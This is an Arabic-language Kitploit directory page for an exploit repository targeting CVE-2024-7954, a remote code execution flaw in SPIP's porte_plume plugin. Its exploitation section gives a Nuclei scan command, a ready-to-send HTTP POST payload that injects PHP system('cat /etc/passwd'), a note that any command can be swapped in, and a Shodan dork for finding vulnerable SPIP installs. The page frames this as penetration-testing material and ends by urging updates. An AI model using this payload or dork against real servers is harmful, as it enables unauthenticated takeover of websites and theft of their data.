Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
RCE-CVE-2024-7954 — استغلال لـ CVE-2024-7954: تنفيذ تعليمات برمجية عن بُعد في إضافة porte_plume الخاصة بـ SPIP. يتضمن قالب مسح Nuclei ودوك Shodan لتحديد الحالات الضعيفة. | Kitploit
أدوات/GitHubGitHub/arthikw3b/rce-cve-2024-7954
الاستطلاعتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبجمع المعلوماتاختبار الاختراق
GitHubarthikw3b/rce-cve-2024-7954

RCE-CVE-2024-7954

استغلال لـ CVE-2024-7954: تنفيذ تعليمات برمجية عن بُعد في إضافة porte_plume الخاصة بـ SPIP. يتضمن قالب مسح Nuclei ودوك Shodan لتحديد الحالات الضعيفة.

عرض المستودع
منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

RCE-CVE-2024-7954

الوصف

إضافة porte_plume المستخدمة في إصدارات SPIP السابقة لـ 4.30-alpha2 و 4.2.13 و 4.1.16 معرضة لثغرة حرجة تنفيذ التعليمات البرمجية التعسفية (RCE). تسمح هذه الثغرة لمهاجم عن بُعد غير مصادق بتنفيذ كود PHP تعسفي كمستخدم SPIP عن طريق إنشاء طلب HTTP محدد. إمكانية الاستغلال خطيرة، مما يمكن المهاجمين من تشغيل أوامر ضارة على الخادم، مما قد يؤدي إلى وصول غير مصرح به، أو اختراق للبيانات، أو اختراق أكبر للنظام.

تفاصيل الثغرة

  • البرنامج المتأثر: SPIP (قبل الإصدارات 4.30-alpha2 و 4.2.13 و 4.1.16)
  • نوع الثغرة: تنفيذ التعليمات البرمجية عن بُعد (RCE)
  • مستوى الخطورة: حرج
  • قابلية الاستغلال: يمكن للمهاجمين عن بُعد وغير المصادقين استغلال هذه الثغرة.

استغلال الثغرة

##Nuclei مسح

root@kitploit:~
kali@Dell:~/nuclei-templates-main/http/cves/2024$ nuclei -l targets -t /home/kali/nuclei-templates-main/http/cves/2024/CVE-2024-7954.yaml





مثال على طلب HTTP مخصص يمكن استخدامه لاستغلال هذه الثغرة هو كالتالي:

root@kitploit:~
POST /index.php?action=porte_plume_previsu HTTP/1.1
Host: {{Hostname}} -> IP
Content-Type: application/x-www-form-urlencoded

data=AA_[->URL<?php system('cat /etc/passwd'); ?>]_BB

شرح الاستغلال

  • يتم توجيه طلب POST إلى إجراء porte_plume_previsu في ملف index.php الخاص بـ SPIP.
  • تحتوي معلمة data على حمولة تستخدم دالة system() في PHP لتنفيذ أمر (في هذه الحالة، cat /etc/passwd) الذي يقرأ محتويات ملف كلمات المرور.
  • من خلال تغيير الأمر داخل دالة system()، يمكن للمهاجم تنفيذ أي كود PHP على الخادم، مما يؤدي إلى عواقب وخيمة.

Shodan Dork

لتحديد تثبيتات SPIP التي قد تكون ضعيفة، يمكن استخدام استعلام البحث التالي في Shodan:

root@kitploit:~
app="SPIP"

تؤكد هذه الثغرة أهمية الحفاظ على تحديث البرامج وتنفيذ إجراءات أمنية قوية للحماية من الاستغلال.

تنزيل الأداة